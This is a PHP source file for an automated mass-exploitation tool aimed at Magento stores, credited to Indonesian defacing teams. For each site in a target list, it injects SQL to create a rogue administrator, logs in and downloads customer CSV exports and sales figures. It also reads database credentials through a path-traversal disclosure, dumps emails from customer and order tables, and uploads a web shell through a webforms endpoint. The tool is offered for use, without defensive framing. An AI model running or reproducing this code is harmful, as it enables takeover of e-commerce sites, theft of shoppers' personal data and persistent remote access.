Magento Spesial (Add,Upload,LFD)

1. <?php
2. /**
3. * Code Name     : Auto Exploit Magento
4. * Release       : 2.0.1 build 13816
5. * Author        : SHOR7CUT (http://facebook.com/bug7sec)
6. * Team          : BUG7SEC | INDOXPLOIT CODERS TEAM | TUBAN CYBER TEAM | DEFACER TERSAKITI TEAM
7. *
8. * PHP Version   : 5.5.35
9. */
10. error_reporting(0);
11. set_time_limit();
12. session_start();
13. $Magento = new Magento;
14. $Magento->username("kodomo123");
15. $Magento->password("kodomo123");
16. $Magento->target("target.txt");
17. $Magento->result("magento-result.txt");
18. $Magento->shellog("magento-shell.txt");
19. $Magento->mailog("magento-maillog.txt");
20. $Magento->xml("magento-xml.txt");
21. $Magento->shell("shc.php");
22. $Magento->cookies("cookies.txt");
23. $Magento->saveCSV("MAGENTO");
24. $Magento->run();
25.  
26. class Magento //extends Exploit
27. {
28.     var $username;
29.     var $password;
30.     var $target;
31.     var $result;
32.     var $email;
33.     var $saveCSV;
34.     var $shell;
35.     var $shellog;
36.     var $mailog;
37.  
38.     public function username($username) {return $this->username = $username;}
39.     public function password($password) {return $this->password = $password;}
40.     public function target($target)     {return $this->target   = $target;}
41.     public function result($result)     {return $this->result   = $result;}
42.     public function setJsite($result)   {return $this->Jsite    = $result;}
43.     public function shell($shell)       {return $this->shell    = $shell;}
44.     public function xml($xml)           {return $this->xml      = $xml;}
45.     public function mailog($mailog)     {return $this->mailog   = $mailog;}
46.     public function cookies($cookies)   {return $this->cookies  = $cookies;}
47.     public function shellog($shellog)   {return $this->shellog  = $shellog;}
48.     public function email(){
49.         return $this->email = substr(md5(time()),2,15)."@bug7sec.com";
50.     }
51.     public function saveCSV($saveCSV){
52.         return $this->saveCSV = $saveCSV;
53.     }
54.     public function pesan($pesan){
55.         echo "[".date("H:i:s")."] ".$pesan."\r\n";
56.     }
57.     public function create_session($data){
58.         return $_SESSION["data"][] = $data;
59.     }
60.     public function check_required(){
61.         if(! file_exists($this->target) ){
62.             $this->pesan("-> Tidak ditemukan File");
63.             exit();
64.         }
65.         if(! function_exists('curl_version') ){
66.             echo "+ CURL tidak terinstall\r\n";
67.             exit;
68.         }
69.         if (!file_exists("BUG7SEC-TEAM")) {
70.             mkdir("BUG7SEC-TEAM",0777);
71.             mkdir("BUG7SEC-TEAM/".$this->saveCSV,0777);
72.         }
73.     }
74.  
75.     public function clean(){
76.         unlink("cookie.txt");
77.         unlink(getcwd().'/cookie.txt');
78.         return true;
79.     }
80.     public function host($sites){
81.         return parse_url($sites, PHP_URL_HOST);
82.     }
83.     public function saves($nama,$data){
84.       $myfile = fopen("BUG7SEC-TEAM/".$nama, "a+") or die("Unable to open file!");
85.       fwrite($myfile, $data);
86.       fclose($myfile);
87.     }
88.  
89.     public function generate($sites){
90.         $sites = parse_url($sites, PHP_URL_HOST);
91.         $this->pesan("[ Generate URL ] ".$sites);
92.         $ch = curl_init($sites);
93.         curl_setopt($ch, CURLOPT_HEADER, false);
94.         curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
95.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
96.         curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
97.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
98.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
99.         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
100.         curl_setopt($ch, CURLOPT_TIMEOUT, 10);
101.         $html = curl_exec($ch);
102.         $redirectURL = curl_getinfo($ch,CURLINFO_EFFECTIVE_URL );
103.         curl_close($ch);
104.         if( parse_url($redirectURL, PHP_URL_PATH) != "/" ){
105.             $uRL = "http://".parse_url($redirectURL, PHP_URL_HOST).parse_url($redirectURL, PHP_URL_PATH);
106.         }else{
107.             $uRL = "http://".parse_url($redirectURL, PHP_URL_HOST)."/";
108.         }
109.         $redirect   = array(
110.             'admin'     => $uRL."admin",
111.             'download'  => $uRL."downloader",
112.             'upload'    => $uRL."js/webforms/upload/",
113.             'xml'       => $uRL,
114.             'payload'   => $uRL."admin/Cms_Wysiwyg/directive/index"
115.         );
116.         $noredirect = array(
117.             'admin'     => "http://".parse_url($redirectURL, PHP_URL_HOST)."/admin",
118.             'download'  => "http://".parse_url($redirectURL, PHP_URL_HOST)."/downloader",
119.             'upload'    => "http://".parse_url($redirectURL, PHP_URL_HOST)."/js/webforms/upload/",
120.             'xml'       => "http://".parse_url($redirectURL, PHP_URL_HOST),
121.             'payload'   => "http://".parse_url($redirectURL, PHP_URL_HOST)."/admin/Cms_Wysiwyg/directive/index"
122.         );
123.         $jsonSites = array(
124.             'redirect'      => $redirect,
125.             'noredirect'    => $noredirect);
126.         return $this->Jsite = $jsonSites;
127.     }
128.  
129.     public function magento_content($sites){
130.         $ch = curl_init($sites);
131.         curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
132.         curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
133.         curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
134.         curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT ,0);
135.         curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
136.         curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
137.         curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
138.         curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/'.$this->cookies);
139.         curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().'/'.$this->cookies);
140.         $data = curl_exec ($ch);
141.         return $data;
142.     }
143.     public function magento_rewire($value){
144.         if(!isset($value)){
145.             return "-";
146.         }
147.             return $value;
148.     }
149.  
150.     public function payload($sites){
151.         $post = array(
152.         "___directive"    => base64_encode("{{block type=Adminhtml/report_search_grid output=getCsvFile}}"),
153.         "filter"          => base64_encode("popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT =  'rp';SET @PASS = CONCAT(MD5(CONCAT( @SALT , '".$this->password."') ), CONCAT(':', @SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','".$this->email."','".$this->username."',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '".$this->username."'),'Firstname');"),
154.         "forwarded"       => 1
155.         );
156.         $ch = curl_init();
157.         curl_setopt($ch, CURLOPT_URL, $sites);
158.         curl_setopt($ch, CURLOPT_HEADER, false);
159.         curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
160.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
161.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
162.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
163.         curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
164.         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
165.         curl_setopt($ch, CURLOPT_TIMEOUT, 60);
166.         curl_setopt($ch, CURLOPT_COOKIEJAR,  getcwd().'/'.$this->cookies);
167.         curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/'.$this->cookies);
168.         curl_setopt($ch, CURLOPT_VERBOSE, false);
169.         curl_setopt($ch, CURLOPT_POST, true);
170.         curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
171.         $data = curl_exec($ch);
172.         $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
173.         curl_close($ch);
174.         if($httpcode == "200"){
175.             return true;
176.         }else{
177.             return false;
178.         }
179.     }
180.  
181.     public function admin($sites){
182.         /* ------- ambil token login ------- */
183.         $regex_loginTOKEN = "/<input name=\"form_key\" type=\"hidden\" value=\"(.*?)\" \\/>/";
184.         preg_match($regex_loginTOKEN, $this->magento_content($sites) , $token);
185.         /* ---------------------------------- */
186.         $ch = curl_init();
187.         curl_setopt($ch, CURLOPT_URL, $sites);
188.         curl_setopt($ch, CURLOPT_HEADER, false);
189.         curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
190.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
191.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
192.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
193.         curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
194.         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
195.         curl_setopt($ch, CURLOPT_TIMEOUT, 60);
196.         curl_setopt($ch, CURLOPT_COOKIEJAR,  getcwd().'/'.$this->cookies);
197.         curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/'.$this->cookies);
198.         curl_setopt($ch, CURLOPT_VERBOSE, false);
199.         curl_setopt($ch, CURLOPT_POST, true);
200.         curl_setopt($ch, CURLOPT_POSTFIELDS, "form_key=".$token[1]."&login[username]=".$this->username."&login[password]=".$this->password);
201.         $data = curl_exec($ch);
202.         $regex_result = "/<span class=\"price\">(.*?)<\\/span>/";
203.         preg_match_all($regex_result    , $data , $matches);
204.         if($matches[0][0]){
205.             $pesan_.=    "[ Admin Login ] ".$sites."\r\n";
206.             $this->pesan("[ Admin Login ] ".$this->host($sites)." +[OK]");
207.             /*------------------ start:customer -----------------------*/
208.             $regex_cusTOKEN = "/\\/customer\\/index\\/key\\/(.*?)\\//";
209.             preg_match_all($regex_cusTOKEN  , $data , $matchToken);
210.             $ch = curl_init($sites."/customer/index/key/".$matchToken[1][0]);
211.             curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
212.             curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
213.             curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
214.             curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT ,0);
215.             curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
216.             curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
217.             curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
218.             curl_setopt ($ch, CURLOPT_COOKIEJAR,  getcwd().'/'.$this->cookies);
219.             curl_setopt ($ch, CURLOPT_COOKIEFILE, getcwd().'/'.$this->cookies);
220.             $resultsCUS = curl_exec($ch);
221.             $cusRegex = "/<span id=\"customerGrid-total-count\" class=\"no-display\">(.*?)<\\/span>/";
222.             preg_match($cusRegex, $resultsCUS, $cusCount);
223.             if( $cusCount[1] ){
224.                 $pesan_.=    "[ Data customer ] ".$cusCount[1]."\r\n";
225.                 $this->pesan("[ Data customer ] ".$cusCount[1]." customer");
226.             }
227.             $this->pesan("[ Data Customer ] Mencoba download customer");
228.             $exportCsv = "/<option value=\"(.*?)\">CSV<\\/option>/";
229.             preg_match($exportCsv, $resultsCUS, $matchesCsv);
230.             $ch = curl_init();
231.             curl_setopt ($ch, CURLOPT_URL, $matchesCsv[1]);
232.             curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
233.             curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT ,0);
234.             curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
235.             curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
236.             curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
237.             curl_setopt ($ch, CURLOPT_COOKIEJAR,  getcwd().'/'.$this->cookies);
238.             curl_setopt ($ch, CURLOPT_COOKIEFILE, getcwd().'/'.$this->cookies);
239.             curl_setopt ($ch, CURLOPT_HEADER, 0);
240.             $out = curl_exec($ch);
241.             curl_close($ch);
242.             $fp = fopen("BUG7SEC-TEAM/".$this->saveCSV."/".parse_url($sites, PHP_URL_HOST).'.csv', 'w');
243.             fwrite($fp, $out);
244.             fclose($fp);
245.             if($fp){
246.                 $pesan_.=    "[ Data Customer ] berhasil di download\r\n";
247.                 $this->pesan("[ Data Customer ] berhasil di download");
248.             }else{
249.                 $pesan_.=    "[ Data Customer ] gagal di download\r\n";
250.                 $this->pesan("[ Data Customer ] gagal di download");
251.             }
252.             /*---------------------------- end:customer | start:order -----------------------*/
253.             $regex_ajaxBlock = "/ajaxBlock\\/key\\/(.*?)\\//";
254.             preg_match($regex_ajaxBlock, $data, $matchesajaxBlock);
255.             $tk = $matchesajaxBlock[1];
256.             $periodeAct = array(
257.                 'Hari'      => '24h',
258.                 'Minggu'    => '7d',
259.                 'Bulan'     => '1m',
260.                 'Tahun'     => '1y'
261.             );                
262.             foreach ($periodeAct as $key => $prioValue) {
263.                 $link_periode = $sites."/dashboard/ajaxBlock/block/totals/key/".$tk."/period/".$prioValue."/?isAjax=true";
264.                 $ch = curl_init($link_periode);
265.                 curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
266.                 curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
267.                 curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
268.                 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT ,0);
269.                 curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
270.                 curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
271.                 curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
272.                 curl_setopt($ch, CURLOPT_COOKIEJAR,  getcwd().'/'.$this->cookies);
273.                 curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/'.$this->cookies);
274.                 $prioResult = curl_exec($ch);
275.                 $ajaxBlockprice = "/\"price\">(.*?)</";
276.                 preg_match_all($ajaxBlockprice, $prioResult, $prioMatch);
277.                 $pesan_ .= "[ Order Period ] ".$periodeAct[$key]  ." : ".
278.                     $this->magento_rewire($prioMatch[1][0])." | ".
279.                     $this->magento_rewire($prioMatch[1][1])." | ".
280.                     $this->magento_rewire($prioMatch[1][2])."\r\n";
281.                 $this->pesan("[ Order Period ] ".$periodeAct[$key]  ." -> ".
282.                     $this->magento_rewire($prioMatch[1][0])." | ".
283.                     $this->magento_rewire($prioMatch[1][1])." | ".
284.                     $this->magento_rewire($prioMatch[1][2]));
285.             }
286.             $IDE = "/<span>IDE<\\/span>/";
287.             $WP = "/<span>WordPress<\\/span>/";
288.             $Smtp = "/SMTP/";
289.             $Mandrill = "/Mandrill/";
290.             preg_match_all($IDE     , $data , $matchIDE);
291.             preg_match_all($WP      , $data , $matchWP);
292.             preg_match_all($Smtp    , $data , $matchesSMTP);
293.             preg_match($Mandrill    , $data , $matchesMandril);
294.  
295.             if($matchIDE[0][0]){
296.                 $pesan_ .= "[+] IDE Home : Found !!!\r\n";
297.             }
298.             if($matchWP[0][0]){
299.                 $pesan_ .= "[+] WP Home  : Found !!!\r\n";
300.             }
301.             if($matchesSMTP[0][0]){
302.                 $pesan_ .= "[+] SMTP     : Found !!!\r\n";
303.             }
304.             if($matchesMandril[0][0]){
305.                 $pesan_ .= "[+] Mandril  : Found !!!\r\n";
306.             }
307.             return $pesan_;
308.         }else{
309.             $this->pesan("[Admin Redirect ] ".$this->host($sites)." +[FAIL]");
310.             return false;
311.         }
312.     }
313.  
314.     public function downloader($sites){
315.         $this->pesan("[ Download Login ] ".$this->host($sites));
316.         $ch = curl_init();
317.         curl_setopt($ch, CURLOPT_URL, $sites);
318.         curl_setopt($ch, CURLOPT_HEADER, false);
319.         curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
320.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
321.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
322.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
323.         curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
324.         curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT ,0);
325.         curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
326.         curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
327.         curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
328.         curl_setopt($ch, CURLOPT_VERBOSE, false);
329.         curl_setopt($ch, CURLOPT_POST, true);
330.         curl_setopt($ch, CURLOPT_POSTFIELDS, "username=".$this->username."&password=".$this->password);
331.         $data = curl_exec($ch);
332.         if(preg_match("/Log Out/i",$data) || (preg_match("/Return to Admin/i",$data))){
333.             $this->pesan("[ Download Login ] ".$this->host($sites)." +[OK]");
334.             $permission = (!preg_match("/Warning: Your Magento folder does not have sufficient write permissions./i",$data) ? "Writeable" : "Denied");
335.               $pesan_ .= "[ Download URL ] ".$sites."\r\n";
336.               $pesan_ .= "[ Download Login ] Success (Permission ".$permission.")\r\n\n";
337.             $this->pesan("[ Download Login ] Success (Permission ".$permission.")");
338.         }else{
339.             $pesan_ .= "[ Download Login ] failed\r\n\n";
340.             $this->pesan("[Download Login ] ".$this->host($sites)." +[FAIL]");
341.         }
342.         return $pesan_;
343.     }
344.  
345.     public function LocalFileDiscloure($target){
346.       $path = array(
347.                "/app/etc/local.xml",
348.                "/magmi/web/download_file.php?file=../../app/etc/local.xml"
349.       );
350.       for($i=0;$i<=count($path);$i++){
351.          $test = $this->magento_content($target.$path[$i]);
352.          if(isset($test) && preg_match('/install/i',$test) && preg_match('/date/i',$test)){
353.          $re = "/<![CDATA[]+(.*?)[]]]>/";
354.          preg_match_all($re, $test, $matches);
355.  
356.          if(isset($matches[1][0])){
357.          $this->pesan("[ LFD Magento ] ".$this->host($target)." +[OK]");
358.          $shc_host = $matches[1][0];
359.          $shc_host = $matches[1][3];
360.          $shc_user = $matches[1][4];
361.          $shc_pass = $matches[1][5];
362.          $shc_db   = $matches[1][6];
363.          $infone   .= "------------------------------\r\n";
364.          $infone   .= "URL      : ".$target."\r\n";
365.          $infone   .= "Host     : ".$shc_host."\r\n";
366.          $infone   .= "Username : ".$shc_user."\r\n";
367.          $infone   .= "Password : ".$shc_pass."\r\n";
368.          $infone   .= "Database : ".$shc_db."\r\n";
369.          $infone   .= "------------------------------\r\n";
370.             $this->saves($this->xml,$infone);
371.             mysql_connect($shc_host, $shc_user , $shc_pass);
372.             mysql_select_db($shc_db);
373.             $query = array(
374.                     'admin_user'                    => 'SELECT * FROM admin_user' ,
375.                     'aw_blog_comment'               => 'SELECT * FROM aw_blog_comment' ,
376.                     'core_email_queue_recipients'   => 'SELECT * FROM core_email_queue_recipients' ,
377.                     'customer_entity'               => 'SELECT * FROM customer_entity' ,
378.                     'newsletter_subscriber'         => 'SELECT * FROM newsletter_subscriber' ,
379.                     'newsletter_template'           => 'SELECT * FROM newsletter_template' ,
380.                     'sales_flat_order_address'      => 'SELECT * FROM sales_flat_order_address' ,
381.                     'sales_flat_quote'              => 'SELECT * FROM sales_flat_quote' ,
382.                     'sales_recurring_profile'       => 'SELECT * FROM sales_recurring_profile'
383.             );
384.             $shcolom = array(
385.                     'admin_user'                    => 'email' ,
386.                     'aw_blog_comment'               => 'email' ,
387.                     'core_email_queue_recipients'   => 'recipient_email' ,
388.                     'customer_entity'               => 'email' ,
389.                     'newsletter_subscriber'         => 'subscriber_email' ,
390.                     'newsletter_template'           => 'template_sender_email' ,
391.                     'sales_flat_order_address'      => 'email' ,
392.                     'sales_flat_quote'              => 'customer_email' ,
393.                     'sales_recurring_profile'       => 'SELECT * FROM admin_user'
394.                 );
395.                 foreach ($query as $shc_key => $shc_query) {
396.                     $hasil = mysql_query($shc_query);
397.                         while ( $kolom_db = mysql_fetch_assoc($hasil) ) {
398.                             $mail[] = $kolom_db[$shcolom[$shc_key]];
399.                         }
400.                 }
401.                
402.                 foreach ($mail as $key => $emailes) {
403.                     $this->saves($this->mailog,$emailes."\r\n");
404.                 }
405.             }else{
406.                 $this->pesan("[ LFD Magento ] ".$this->host($sites)." +[FAIL]");
407.             }
408.          }
409.       }
410.     }
411.  
412.     public function webforms($sites){
413.         $this->pesan("[ webforms ] ".$this->host($sites));
414.         $post = array('files[]'=>"@".$this->shell) ;
415.         $ch = curl_init();
416.         curl_setopt ($ch, CURLOPT_URL, $sites);
417.         curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
418.         curl_setopt ($ch, CURLOPT_POST, true);
419.         curl_setopt ($ch, CURLOPT_POSTFIELDS,$post);
420.         curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
421.         curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
422.         curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
423.         curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT ,0);
424.         curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
425.         $data = curl_exec($ch);
426.         curl_close($ch);
427.         $json = json_decode($data,true);
428.         if( $json['0']['url'] ){
429.             $this->saves($this->shellog,"Shell : ".$json['0']['url']."\r\n");
430.             return true;
431.         }
432.             return false;
433.     }
434.  
435.  
436.     public function run(){
437.         $this->check_required();
438.         $load_file = file_get_contents($this->target);
439.         $load_file = explode("\r\n", $load_file );
440.         $cnfile     = count($load_file);
441.         $is = 1;
442.         foreach ($load_file as $key => $sites) {
443.         $this->pesan("[ Informasi ] Target ".$is."/".$cnfile." Situs");
444.         $this->clean();
445.         $this->generate($sites);
446.  
447.         if ( $this->payload($this->Jsite['noredirect']['payload']) ){
448.  
449.             $this->pesan("[ Payload Noredirect ] ".$this->host($this->Jsite['noredirect']['payload'])." +[OK]");
450.            
451.             $admin    = $this->admin($this->Jsite['noredirect']['admin']);
452.             $download = $this->downloader($this->Jsite['noredirect']['download']);
453.            
454.             $this->saves($this->result,$admin);
455.             $this->saves($this->result,$download);
456.  
457.         }else if ( $this->payload($this->Jsite['redirect']['payload']) ){
458.  
459.             $this->pesan("[ Payload redirect ] ".$this->host($this->Jsite['redirect']['payload'])." +[OK]");
460.            
461.             $admin    = $this->admin($this->Jsite['redirect']['admin']);
462.             $download = $this->downloader($this->Jsite['redirect']['download']);
463.  
464.             $this->saves($this->result,$admin);
465.             $this->saves($this->result,$download."\r\n\n");
466.  
467.         }else{
468.             $this->pesan("[ Payload nore/redir ] ".$this->host($sites)." +[Not Vuln]");
469.         }
470.  
471.    
472.         if($this->Jsite['noredirect']['xml'] == $this->Jsite['redirect']['xml'] ){
473.             $this->LocalFileDiscloure($this->Jsite['noredirect']['xml']);
474.         }else{
475.             $this->LocalFileDiscloure($this->Jsite['noredirect']['xml']);
476.             $this->LocalFileDiscloure($this->Jsite['redirect']['xml']);
477.         }
478.        
479.         if( $this->Jsite['noredirect']['upload'] == $this->Jsite['redirect']['upload'] ){
480.                 $this->webforms($this->Jsite['redirect']['upload']);
481.         }else{
482.                 $this->webforms($this->Jsite['redirect']['upload']);
483.                 $this->webforms($this->Jsite['noredirect']['upload']);
484.         }
485.             echo "\r\n";
486.             $is++;
487.         }
488.     }
489.  
490. }